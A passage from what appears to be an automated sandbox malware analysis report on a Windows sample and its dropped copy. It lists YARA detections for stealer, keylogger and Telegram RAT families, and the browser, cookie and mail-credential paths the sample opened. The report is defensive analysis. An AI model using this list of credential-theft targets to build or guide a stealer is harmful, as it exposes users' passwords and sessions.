Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Users\user\Desktop\Ti5nuRV7y4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Users\user\AppData\Roaming\aoTiGLRa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Users\user\AppData\Roaming\aoTiGLRa.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.7340000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.7340000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
